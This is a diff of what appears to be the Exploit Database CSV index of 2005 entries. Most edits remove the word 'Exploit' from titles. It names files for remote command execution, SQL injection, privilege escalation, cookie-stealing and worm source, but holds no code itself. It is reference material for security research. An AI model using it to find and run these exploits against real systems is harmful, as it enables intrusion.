@@ id,file,description,date,author,platform,type,port 977,platforms/hp-ux/remote/977.c,"HP-UX FTPD 1.1.214.4 - 'REST' Remote Brute Force Exploit",2005-05-03,phased,hp-ux,remote,0 978,platforms/windows/dos/978.cpp,"Ashley's Web Server - Denial of Service",2005-05-04,basher13,windows,dos,0 979,platforms/windows/remote/979.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (1)",2005-05-04,Mouse,windows,remote,0 -980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution Exploit",2005-05-04,"Jerome Athias",cgi,webapps,0 -981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String Exploit",2005-05-05,cybertronic,linux,remote,25 +980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0 +981,platforms/linux/remote/981.c,"dSMTP Mail Server 3.1b - Linux Remote Root Format String",2005-05-05,cybertronic,linux,remote,25 982,platforms/php/webapps/982.c,"ZeroBoard Worm - Source Code",2005-05-06,anonymous,php,webapps,0 983,platforms/windows/dos/983.cpp,"DataTrac Activity Console - Denial of Service",2005-05-06,basher13,windows,dos,0 984,platforms/multiple/dos/984.c,"Ethereal 0.10.10 - (dissect_ipc_state) Remote Denial of Service",2005-05-07,Nicob,multiple,dos,0 @@ -812,10 +812,10 @@ id,file,description,date,author,platform,type,port 998,platforms/linux/dos/998.c,"Linux Kernel 2.6.12-rc4 - 'ioctl_by_bdev' Local Denial of Service",2005-05-17,alert7,linux,dos,0 999,platforms/linux/dos/999.c,"Gaim 1.2.1 - URL Handling Remote Stack Overflow",2005-05-17,Ron,linux,dos,0 1000,platforms/windows/dos/1000.cpp,"Microsoft Windows 2003/XP - IPv6 Remote Denial of Service",2005-05-17,"Konrad Malewski",windows,dos,0 -1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition Exploit Exploit",2005-05-19,watercloud,aix,local,0 -1003,platforms/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution Exploit",2005-05-20,Silentium,php,webapps,0 -1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (2)",2005-05-20,Nikyt0x,cgi,webapps,0 -1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution Exploit (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 +1001,platforms/aix/local/1001.txt,"AIX 5.1 Bellmail - Local Race Condition",2005-05-19,watercloud,aix,local,0 +1003,platforms/php/webapps/1003.c,"Fusion SBX 1.2 - Remote Command Execution",2005-05-20,Silentium,php,webapps,0 +1004,platforms/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,cgi,webapps,0 +1005,platforms/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,cgi,webapps,0 1006,platforms/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - register.php SQL Injection",2005-05-20,deluxe89,php,webapps,0 1007,platforms/multiple/remote/1007.html,"Mozilla Firefox - view-source:JavaScript url Code Execution",2005-05-21,mikx,multiple,remote,0 1008,platforms/multiple/dos/1008.c,"TCP TIMESTAMPS - Denial of Service",2005-05-21,"Daniel Hartmeier",multiple,dos,0 @@ -826,12 +826,12 @@ id,file,description,date,author,platform,type,port 1013,platforms/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",php,webapps,0 1014,platforms/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (tutorial)",2005-05-27,"Danica Jones",php,webapps,0 1015,platforms/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",asp,webapps,0 -1016,platforms/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass Exploit (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 -1017,platforms/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass Exploit (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 -1018,platforms/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass Exploit (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 +1016,platforms/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,php,webapps,0 +1017,platforms/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,php,webapps,0 +1018,platforms/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,php,webapps,0 1019,platforms/windows/local/1019.c,"Microsoft Windows - COM Structured Storage Local Exploit (MS05-012)",2005-05-31,"Cesar Cerrudo",windows,local,0 1020,platforms/php/webapps/1020.c,"ZeroBoard 4.1 - preg_replace Remote nobody Shell Exploit",2005-05-31,n0gada,php,webapps,0 -1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - (SIP) Protocol Dissector Remote Buffer Overflow Exploit",2005-05-31,"Team W00dp3ck3r",linux,remote,0 +1021,platforms/linux/remote/1021.c,"Ethereal 0.10.10 - (SIP) Protocol Dissector Remote Buffer Overflow",2005-05-31,"Team W00dp3ck3r",linux,remote,0 1022,platforms/php/webapps/1022.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'calendar.php' SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 1023,platforms/php/webapps/1023.pl,"MyBloggie 2.1.1 < 2.1.2 - SQL Injection",2005-05-31,"Alberto Trivero",php,webapps,0 1024,platforms/windows/dos/1024.html,"Microsoft Internet Explorer - Multiple Stack Overflows Crash",2005-05-31,"Benjamin Franz",windows,dos,0 @@ -848,11 +848,11 @@ id,file,description,date,author,platform,type,port 1035,platforms/windows/remote/1035.c,"IPSwitch IMAP Server - LOGON Remote Stack Overflow",2005-06-07,nolimit,windows,remote,143 1036,platforms/php/webapps/1036.php,"Invision Power Board 1.3.1 - 'login.php' SQL Injection",2005-06-08,anonymous,php,webapps,0 1037,platforms/multiple/dos/1037.c,"Tcpdump - bgp_update_print Remote Denial of Service",2005-06-09,simon,multiple,dos,0 -1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String Exploit",2005-06-10,qobaiashi,linux,remote,143 -1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 -1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution Exploit (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 -1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution Exploit (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 -1043,platforms/osx/local/1043.c,"Apple Mac OS X 10.4 - launchd Race Condition Exploit",2005-06-14,intropy,osx,local,0 +1038,platforms/linux/remote/1038.c,"GNU Mailutils imap4d 0.5 < 0.6.90 - Remote Format String",2005-06-10,qobaiashi,linux,remote,143 +1039,platforms/cgi/webapps/1039.pl,"Webhints 1.03 - Remote Command Execution (Perl) (1)",2005-06-11,Alpha_Programmer,cgi,webapps,0 +1040,platforms/cgi/webapps/1040.c,"Webhints 1.03 - Remote Command Execution (C) (2)",2005-06-11,Alpha_Programmer,cgi,webapps,0 +1041,platforms/cgi/webapps/1041.pl,"Webhints 1.03 - Remote Command Execution (Perl) (3)",2005-06-11,MadSheep,cgi,webapps,0 +1043,platforms/osx/local/1043.c,"Apple Mac OSX 10.4 - launchd Race Condition",2005-06-14,intropy,osx,local,0 1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0 1046,platforms/aix/local/1046.c,"AIX 5.2 - 'paginit' Privilege Escalation",2005-06-14,intropy,aix,local,0 @@ -863,14 +863,14 @@ id,file,description,date,author,platform,type,port 1051,platforms/php/webapps/1051.pl,"Ultimate PHP Board 1.9.6 GOLD - users.dat Password Decryptor",2005-06-16,"Alberto Trivero",php,webapps,0 1052,platforms/php/webapps/1052.php,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (1)",2005-06-17,mh_p0rtal,php,webapps,0 1053,platforms/php/webapps/1053.pl,"Claroline E-Learning 1.6 - Remote Hash SQL Injection (2)",2005-06-19,K-C0d3r,php,webapps,0 -1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String Exploit",2005-06-20,darkeagle,linux,remote,7144 +1055,platforms/linux/remote/1055.c,"PeerCast 0.1211 - Remote Format String",2005-06-20,darkeagle,linux,remote,7144 1056,platforms/multiple/dos/1056.pl,"Apache 2.0.49 - Arbitrary Long HTTP Headers Denial of Service",2005-06-20,Qnix,multiple,dos,0 1057,platforms/php/webapps/1057.pl,"Simple Machines Forum 1.0.4 - (modify) SQL Injection",2005-06-21,"James Bercegay",php,webapps,0 1058,platforms/php/webapps/1058.pl,"MercuryBoard 1.1.4 - SQL Injection",2005-06-21,RusH,php,webapps,0 1059,platforms/php/webapps/1059.pl,"WordPress 1.5.1.1 - 'add new admin' SQL Injection",2005-06-21,RusH,php,webapps,0 -1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0 +1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 - Full Command Execution",2005-06-21,RusH,php,webapps,0 1061,platforms/php/webapps/1061.pl,"Mambo 4.5.2.1 - SQL Injection",2005-06-21,RusH,php,webapps,0 -1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0 +1062,platforms/php/webapps/1062.pl,"Cacti 0.8.6d - Remote Command Execution",2005-06-22,"Alberto Trivero",php,webapps,0 1063,platforms/php/dos/1063.pl,"phpBB 2.0.15 - Register Multiple Users Denial of Service (Perl)",2005-06-22,g30rg3_x,php,dos,0 1064,platforms/php/dos/1064.c,"phpBB 2.0.15 - Register Multiple Users Denial of Service (C)",2005-06-22,HaCkZaTaN,php,dos,0 1065,platforms/windows/dos/1065.c,"Microsoft Windows - 'SMB' Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0 @@ -891,10 +891,10 @@ id,file,description,date,author,platform,type,port 1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - (highlight) Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 1081,platforms/hardware/remote/1081.c,"Nokia Affix < 3.2.0 - btftp Remote Client Exploit",2005-07-03,"Kevin Finisterre",hardware,remote,0 1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 - xmlrpc.php SQL Injection",2005-07-04,RusH,php,webapps,0 -1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution Exploit (2)",2005-07-04,dukenn,php,webapps,0 -1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution Exploit (3)",2005-07-04,"Mike Rifone",php,webapps,0 +1083,platforms/php/webapps/1083.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution (2)",2005-07-04,dukenn,php,webapps,0 +1084,platforms/php/webapps/1084.pl,"xmlrpc.php Library 1.3.0 - Remote Command Execution (3)",2005-07-04,"Mike Rifone",php,webapps,0 1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0 -1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure Exploit",2005-07-04,Kozan,windows,local,0 +1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,windows,local,0 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local,0 1088,platforms/php/webapps/1088.pl,"Drupal 4.5.3 <= 4.6.1 - Comments PHP Injection",2005-07-05,dab,php,webapps,0 1089,platforms/windows/remote/1089.c,"Mozilla FireFox 1.0.1 - Remote GIF Heap Overflow",2005-07-05,darkeagle,windows,remote,0 @@ -903,17 +903,17 @@ id,file,description,date,author,platform,type,port 1092,platforms/solaris/local/1092.c,"Solaris (SPARC / x86) - Local Socket Hijack Exploit",2005-07-06,c0ntex,solaris,local,0 1093,platforms/windows/dos/1093.c,"PrivaShare 1.3 - Denial of Service",2005-07-07,basher13,windows,dos,0 1094,platforms/windows/dos/1094.pl,"AnalogX SimpleServer:WWW 1.05 - Denial of Service",2005-07-07,Qnix,windows,dos,0 -1095,platforms/php/webapps/1095.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Exploit",2005-07-08,D|ablo,php,webapps,0 +1095,platforms/php/webapps/1095.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-08,D|ablo,php,webapps,0 1096,platforms/windows/remote/1096.txt,"Hosting Controller 0.6.1 HotFix 2.1 - Change Credit Limit Exploit",2005-07-10,"Soroush Dalili",windows,remote,0 -1097,platforms/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure Exploit",2005-07-11,LazyCrs,php,webapps,0 +1097,platforms/php/webapps/1097.txt,"BlogTorrent 0.92 - Remote Password Disclosure",2005-07-11,LazyCrs,php,webapps,0 1099,platforms/windows/remote/1099.pl,"Baby Web Server 2.6.2 - Command Validation Exploit",2005-07-11,basher13,windows,remote,0 1100,platforms/windows/dos/1100.pl,"Remote File Explorer 1.0 - Denial of Service",2005-07-11,basher13,windows,dos,0 1101,platforms/windows/dos/1101.c,"wMailServer 1.0 - Remote Denial of Service",2005-07-12,Kozan,windows,dos,0 1102,platforms/windows/remote/1102.html,"Mozilla Firefox 1.0.4 - 'Set As Wallpaper' Code Execution",2005-07-13,"Michael Krax",windows,remote,0 -1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure Exploit (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 +1103,platforms/php/webapps/1103.txt,"phpBB 2.0.16 - Cross-Site Scripting Remote Cookie Disclosure (cookie grabber)",2005-07-13,"Sjaak Rake",php,webapps,0 1104,platforms/windows/dos/1104.cpp,"Microsoft Windows - Netman Service Local Denial of Service",2005-07-14,bkbll,windows,dos,0 1105,platforms/windows/dos/1105.c,"netPanzer 0.8 - Remote Denial of Service",2005-07-14,"Luigi Auriemma",windows,dos,0 -1106,platforms/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure Exploit",2005-07-14,warlord,php,webapps,0 +1106,platforms/php/webapps/1106.txt,"e107 0.617 - Cross-Site Scripting Remote Cookie Disclosure",2005-07-14,warlord,php,webapps,0 1107,platforms/windows/dos/1107.pl,"Remote Control Server 1.6.2 - Denial of Service",2005-07-15,basher13,windows,dos,0 1108,platforms/windows/remote/1108.pl,"Small HTTP Server 3.05.28 - Arbitrary Data Execution Exploit",2005-07-15,basher13,windows,remote,0 1109,platforms/windows/dos/1109.pl,"DzSoft PHP Editor 3.1.2.8 - Denial of Service",2005-07-15,basher13,windows,dos,0 @@ -925,24 +925,24 @@ id,file,description,date,author,platform,type,port 1115,platforms/windows/remote/1115.pl,"Intruder Client 1.00 - Remote Command Execution / Denial of Service",2005-07-21,basher13,windows,remote,0 1116,platforms/windows/dos/1116.c,"Microsoft Windows - Color Management Module Overflow (MS05-036) (1)",2005-07-21,snooq,windows,dos,0 1118,platforms/windows/remote/1118.c,"SlimFTPd 3.16 - Remote Buffer Overflow",2005-07-25,redsand,windows,remote,21 -1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - (modlines) Local Command Execution Exploit",2005-07-25,"Georgi Guninski",multiple,local,0 -1120,platforms/cgi/webapps/1120.pl,"FtpLocate 2.02 - (current) Remote Command Execution Exploit",2005-07-25,newbug,cgi,webapps,0 +1119,platforms/multiple/local/1119.txt,"vim 6.3 < 6.3.082 - (modlines) Local Command Execution",2005-07-25,"Georgi Guninski",multiple,local,0 +1120,platforms/cgi/webapps/1120.pl,"FtpLocate 2.02 - (current) Remote Command Execution",2005-07-25,newbug,cgi,webapps,0 1121,platforms/windows/dos/1121.pl,"FTPshell Server 3.38 - Remote Denial of Service",2005-07-26,"Reed Arvin",windows,dos,0 -1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String Exploit",2005-08-01,CoKi,linux,remote,143 +1123,platforms/linux/remote/1123.c,"GNU Mailutils imap4d 0.6 - Remote Format String",2005-08-01,CoKi,linux,remote,143 1124,platforms/linux/remote/1124.pl,"IPSwitch IMail Server 8.15 - IMAPD Remote Root Exploit",2005-08-01,kingcope,linux,remote,143 1126,platforms/windows/dos/1126.c,"BusinessMail Server 4.60.00 - Remote Denial of Service",2005-08-01,Kozan,windows,dos,0 -1127,platforms/windows/dos/1127.cpp,"ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash Exploit",2005-08-01,"evil dabus",windows,dos,0 +1127,platforms/windows/dos/1127.cpp,"ProRat Server 1.9 (Fix-2) - Buffer Overflow Crash",2005-08-01,"evil dabus",windows,dos,0 1128,platforms/windows/local/1128.c,"Microsoft Windows - 'LegitCheckControl.dll' Genuine Advantage Validation Patch",2005-08-01,HaCkZaTaN,windows,local,0 1129,platforms/windows/dos/1129.c,"Quick 'n EasY 3.0 FTP Server - Remote Denial of Service",2005-08-02,Kozan,windows,dos,0 1130,platforms/windows/remote/1130.c,"CA BrightStor ARCserve Backup Agent - 'dbasqlr.exe' Remote Exploit",2005-08-03,cybertronic,windows,remote,6070 1131,platforms/windows/remote/1131.c,"CA BrightStor ARCserve Backup - 'dsconfig.exe' Buffer Overflow",2005-08-03,cybertronic,windows,remote,41523 1132,platforms/windows/remote/1132.c,"CA BrightStor ARCserve Backup - Exploiter Tool",2005-08-03,cybertronic,windows,remote,6070 -1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution Exploit (Metasploit)",2005-08-03,str0ke,php,webapps,0 +1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution (Metasploit)",2005-08-03,str0ke,php,webapps,0 1134,platforms/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",php,webapps,0 1135,platforms/php/webapps/1135.c,"PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection",2005-08-05,Easyex,php,webapps,0 1137,platforms/windows/dos/1137.pl,"Acunetix HTTP Sniffer - Denial of Service",2005-08-05,basher13,windows,dos,0 -1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution Exploit",2005-08-05,CoKi,linux,remote,0 -1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String Exploit",2005-08-06,vade79,linux,remote,0 +1138,platforms/linux/remote/1138.c,"nbSMTP 0.99 - 'util.c' Client-Side Command Execution",2005-08-05,CoKi,linux,remote,0 +1139,platforms/linux/remote/1139.c,"Ethereal 10.x - AFP Protocol Dissector Remote Format String",2005-08-06,vade79,linux,remote,0 1140,platforms/php/webapps/1140.php,"Flatnuke 2.5.5 - Remote Code Execution",2005-08-08,rgod,php,webapps,0 1142,platforms/php/webapps/1142.php,"WordPress 1.5.1.3 - Remote Code Execution",2005-08-09,Kartoffelguru,php,webapps,0 1143,platforms/windows/dos/1143.sys,"Microsoft Windows XP SP2 - 'rdpwd.sys' Remote Kernel Denial of Service",2005-08-09,"Tom Ferris",windows,dos,0 @@ -965,15 +965,15 @@ id,file,description,date,author,platform,type,port 1162,platforms/windows/dos/1162.pl,"GoodTech SMTP Server 5.14 - Denial of Service",2005-06-07,"Reed Arvin",windows,dos,0 1163,platforms/windows/dos/1163.pl,"IA eMailServer Corporate Edition 5.2.2 - Denial of Service",2005-06-26,"Reed Arvin",windows,dos,0 1164,platforms/windows/dos/1164.pl,"BusinessMail 4.60.00 - Remote Buffer Overflow",2005-07-30,"Reed Arvin",windows,dos,0 -1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) Buffer Overflow Exploit",2005-06-27,"Reed Arvin",windows,dos,0 -1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) Buffer Overflow Exploit",2005-06-27,"Reed Arvin",windows,dos,0 +1165,platforms/windows/dos/1165.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (SMTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 +1166,platforms/windows/dos/1166.pl,"Inframail Advantage Server Edition 6.0 <= 6.37 - (FTP) Buffer Overflow",2005-06-27,"Reed Arvin",windows,dos,0 1167,platforms/solaris/remote/1167.pm,"Solaris 10 LPD - Arbitrary File Delete Exploit (Metasploit)",2005-08-19,Optyx,solaris,remote,0 1168,platforms/windows/local/1168.c,"WinAce 2.6.0.5 - Temporary File Parsing Buffer Overflow",2005-08-19,ATmaCA,windows,local,0 1170,platforms/linux/local/1170.c,"Debian 2.2 - /usr/bin/pileup Privilege Escalation",2001-07-13,"Charles Stevenson",linux,local,0 1171,platforms/linux/remote/1171.c,"Elm < 2.5.8 - (Expires Header) Remote Buffer Overflow",2005-08-22,c0ntex,linux,remote,0 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) 1.00 RC4 - 'search.php' SQL Injection",2005-08-22,Alpha_Programmer,php,webapps,0 -1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 -1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0 +1173,platforms/windows/local/1173.c,"Mercora IMRadio 4.0.0.0 - Local Password Disclosure",2005-08-22,Kozan,windows,local,0 +1174,platforms/windows/local/1174.c,"ZipTorrent 1.3.7.3 - Local Proxy Password Disclosure",2005-08-22,Kozan,windows,local,0 1175,platforms/cgi/dos/1175.pl,"GTChat 0.95 Alpha - (adduser) Remote Denial of Service",2005-08-23,VTECin5th,cgi,dos,0 1176,platforms/multiple/dos/1176.c,"Ventrilo 2.3.0 - Remote Denial of Service (All Platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0 1178,platforms/windows/remote/1178.c,"Microsoft IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0 @@ -983,8 +983,8 @@ id,file,description,date,author,platform,type,port 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (sparc) - (ld.so.1) Privilege Escalation",2004-12-24,"Marco Ivaldi",solaris,local,0 1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service",2005-08-29,"Luigi Auriemma",windows,remote,0 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow (2)",2005-08-30,basher13,windows,remote,80 -1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OS X) - Privilege Escalation",2005-08-30,vade79,osx,local,0 -1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OS X) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0 +1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 (OSX) - Privilege Escalation",2005-08-30,vade79,osx,local,0 +1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 (OSX) - '-lib' Privilege Escalation",2005-08-30,vade79,osx,local,0 1187,platforms/linux/local/1187.c,"Gopher 3.0.9 - (+VIEWS) Remote Client Side Buffer Overflow",2005-08-30,vade79,linux,local,0 1188,platforms/multiple/remote/1188.c,"HP OpenView Network Node Manager 7.50 - Remote Exploit",2005-08-30,Lympex,multiple,remote,0 1189,platforms/php/webapps/1189.c,"vBulletin 3.0.8 - Accessible Database Backup Searcher (update 3)",2005-08-31,str0ke,php,webapps,0 @@ -992,18 +992,18 @@ id,file,description,date,author,platform,type,port 1191,platforms/php/webapps/1191.pl,"Simple PHP Blog 0.4.0 - Multiple Remote Exploits",2005-09-01,"Kenneth Belva",php,webapps,0 1192,platforms/windows/dos/1192.cpp,"P2P Pro 1.0 - (command) Denial of Service",2005-09-02,basher13,windows,dos,0 1193,platforms/windows/remote/1193.pl,"Free SMTP Server 2.2 - Spam Filter",2005-09-02,basher13,windows,remote,0 -1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution Exploit (update2)",2005-09-04,tracewar,cgi,webapps,0 +1194,platforms/cgi/webapps/1194.c,"man2web 0.88 - Multiple Remote Command Execution (update2)",2005-09-04,tracewar,cgi,webapps,0 1196,platforms/linux/dos/1196.c,"CUPS Server 1.1 - (Get Request) Denial of Service",2005-09-05,tracewar,linux,dos,0 1197,platforms/windows/local/1197.c,"Microsoft Windows - 'keybd_event' Local Privilege Elevation Exploit",2005-09-06,"Andrés Acunha",windows,local,0 1198,platforms/windows/local/1198.c,"Microsoft Windows - CSRSS Privilege Escalation (MS05-018)",2005-09-06,eyas,windows,local,0 1199,platforms/windows/dos/1199.c,"BNBT BitTorrent EasyTracker 7.7r3 - Denial of Service",2005-09-06,Sowhat,windows,dos,0 -1200,platforms/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution Exploit (1)",2005-09-07,rgod,php,webapps,0 -1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution Exploit",2005-09-07,basher13,windows,remote,0 -1202,platforms/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution Exploit (2)",2005-09-07,RusH,php,webapps,0 +1200,platforms/php/webapps/1200.php,"PBLang 4.65 - Remote Command Execution (1)",2005-09-07,rgod,php,webapps,0 +1201,platforms/windows/remote/1201.pl,"FTP Internet Access Manager 1.2 - Command Execution",2005-09-07,basher13,windows,remote,0 +1202,platforms/php/webapps/1202.php,"PBLang 4.65 - Remote Command Execution (2)",2005-09-07,RusH,php,webapps,0 1204,platforms/multiple/dos/1204.html,"Mozilla Products - (Host:) Buffer Overflow Denial of Service String",2005-09-09,"Tom Ferris",multiple,dos,0 1207,platforms/php/webapps/1207.php,"Class-1 Forum 0.24.4 - Remote Code Execution",2005-09-09,rgod,php,webapps,0 1208,platforms/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection",2005-03-27,basher13,php,webapps,0 -1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - (search) Remote Format String Exploit",2005-09-10,"Clément Lecigne",linux,remote,143 +1209,platforms/linux/remote/1209.c,"GNU Mailutils imap4d 0.6 - 'Search' Remote Format String",2005-09-10,"Clément Lecigne",linux,remote,143 1210,platforms/windows/remote/1210.pm,"WebAdmin 2.0.4 - USER Buffer Overflow (Metasploit)",2005-09-11,y0,windows,remote,1000 1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection Attacks Exploit",2005-09-11,Megabyte,php,webapps,0 1212,platforms/windows/dos/1212.pl,"COOL! Remote Control 1.12 - Remote Denial of Service",2005-09-11,basher13,windows,dos,0 @@ -1014,7 +1014,7 @@ id,file,description,date,author,platform,type,port 1218,platforms/windows/dos/1218.c,"Stoney FTPd - Denial of Service (rxBot mods ftpd)",2005-09-16,D-oNe,windows,dos,0 1219,platforms/php/webapps/1219.c,"PHP-Nuke 7.8 - 'modules.php' SQL Injection",2005-09-16,RusH,php,webapps,0 1220,platforms/windows/dos/1220.pl,"Fastream NETFile Web Server 7.1.2 - (HEAD) Denial of Service",2005-09-16,karak0rsan,windows,dos,0 -1221,platforms/php/webapps/1221.php,"CuteNews 1.4.0 - (shell inject) Remote Command Execution Exploit",2005-09-17,rgod,php,webapps,0 +1221,platforms/php/webapps/1221.php,"CuteNews 1.4.0 - (shell inject) Remote Command Execution",2005-09-17,rgod,php,webapps,0 1222,platforms/windows/dos/1222.pl,"MCCS (Multi-Computer Control Systems) Command - Denial of Service",2005-09-19,basher13,windows,dos,0 1223,platforms/windows/remote/1223.c,"Mercury Mail 4.01a (Pegasus) - IMAP Buffer Overflow",2005-09-20,c0d3r,windows,remote,143 1224,platforms/windows/remote/1224.html,"Mozilla Browsers - 0xAD (HOST:) Remote Heap Buffer Overrun Exploit (2)",2005-09-22,Skylined,windows,remote,0 @@ -1023,23 +1023,23 @@ id,file,description,date,author,platform,type,port 1227,platforms/php/webapps/1227.php,"MailGust 1.9 - (board takeover) SQL Injection",2005-09-24,rgod,php,webapps,0 1229,platforms/linux/local/1229.sh,"Qpopper 4.0.8 (Linux) - (poppassd) Privilege Escalation",2005-09-24,kingcope,linux,local,0 1230,platforms/bsd/local/1230.sh,"Qpopper 4.0.8 (FreeBSD) - (poppassd) Privilege Escalation",2005-09-24,kingcope,bsd,local,0 -1231,platforms/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution Exploit",2005-09-24,kingcope,linux,remote,21 -1232,platforms/linux/remote/1232.c,"RealPlayer/Helix Player (Linux) - Remote Format String Exploit",2005-09-26,c0ntex,linux,remote,0 +1231,platforms/linux/remote/1231.pl,"WzdFTPD 0.5.4 - Remote Command Execution",2005-09-24,kingcope,linux,remote,21 